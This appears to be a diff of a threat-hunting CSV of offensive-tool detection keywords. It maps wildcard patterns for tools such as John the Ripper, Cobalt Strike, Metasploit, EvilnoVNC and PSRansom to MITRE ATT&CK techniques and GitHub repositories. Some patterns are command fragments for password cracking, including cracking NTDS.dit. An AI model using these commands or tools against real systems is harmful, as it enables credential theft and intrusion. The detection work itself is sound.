-"*jmmcatee/cracklord*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","377","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
+"*jmmcatee/cracklord*","offensive_tool_keyword","cracklord","Queue and resource system for cracking passwords","T1110 - T1201","TA0006 - 
TA0002","N/A","N/A","Credential Access","https://github.com/jmmcatee/cracklord","1","1","N/A","10","4","378","74","2022-09-22T09:30:14Z","2013-12-09T23:10:54Z"
 "*JMousqueton/PoC-CVE-2022-30190*","offensive_tool_keyword","POC","POC CVE-2022-30190 CVE 0-day MS Offic RCE aka msdt follina","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/JMousqueton/PoC-CVE-2022-30190","1","1","N/A","N/A","2","149","58","2022-06-05T21:06:13Z","2022-05-30T18:17:38Z"
-"*jndi_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
-"*JNDI-Injection-Exploit*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","715","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z"
+"*jndi_injection.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*JNDI-Injection-Exploit*","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2331","716","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z"
 "*Job killed and console drained*","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","557","86","2023-08-13T13:24:00Z","2020-11-02T20:02:55Z"
-"*JoelGMSec/EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-09-25T10:50:52Z","2022-09-04T10:48:49Z"
+"*JoelGMSec/EvilnoVNC*","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - 
T1566.001 - T1071 - T1071.001","TA0043 - TA0001","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","1","N/A","9","7","662","118","2023-10-04T15:20:08Z","2022-09-04T10:48:49Z"
 "*JoelGMSec/PSRansom*","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","1","N/A","N/A","4","371","95","2022-09-29T09:54:34Z","2022-02-27T11:52:03Z"
 "*Joey is the best hacker in Hackers*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
-"*john * --incremental*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john * -w=*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john * --wordlist=*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-groups*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *htdigest*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-inc *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-incremental *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-shells*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-show*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-single*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline 
password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-users*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *-wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john *--wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john * --incremental*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john * -w=*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john * --wordlist=*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john 
*-groups*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *htdigest*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-inc *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-incremental *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-shells*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-show*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-single*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-users*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *-wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john *--wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*john --format=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*john hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john NTDS.dit*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john --show *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john --status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*John the Ripper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john hashes*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john NTDS.dit*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --show *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline 
password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --status*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*John the Ripper*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*john --wordlist*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
 "*john --wordlist=*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
-"*John*the*Ripper*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
-"*john.bash_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john.session.log*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john.zsh_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*John*the*Ripper*","offensive_tool_keyword","JohnTheRipper","John the Ripper is a fast password cracker.","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/magnumripper/JohnTheRipper","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.bash_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.session.log*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john.zsh_completion*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*john/password.lst*","offensive_tool_keyword","wordlists","package contains 
the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*john/run/fuzz.dic*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john/src/ztex/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john/run/fuzz.dic*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john/src/ztex/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*john@moozle.wtf*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" -"*john_crack_asrep*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*john_crack_kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john_mpi.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*JohnTheRipper *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_crack_asrep*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*john_crack_kerberoast*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*john_log_format*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_mpi.c*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*john_register_all*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JohnTheRipper *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 
cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*JohnTheRipper/*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*joomscan -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*joomscan*","offensive_tool_keyword","joomscan","Joomla Vulnerability Scanner.","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Web Attacks","https://github.com/rezasp/joomscan","1","0","N/A","N/A","10","950","250","2022-03-19T13:40:03Z","2016-09-01T09:06:17Z" "*Jormungandr.cpp*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*Jormungandr.exe*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" 
"*Jormungandr-master*","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","3","203","23","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z" "*JPCERTCC*","offensive_tool_keyword","Github Username","github repo name containing multiple tools for log exploitation","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/JPCERTCC","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*jpillora/chisel*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","1","N/A","10","10","9891","1162","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z" -"*jquery-c2.*.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - 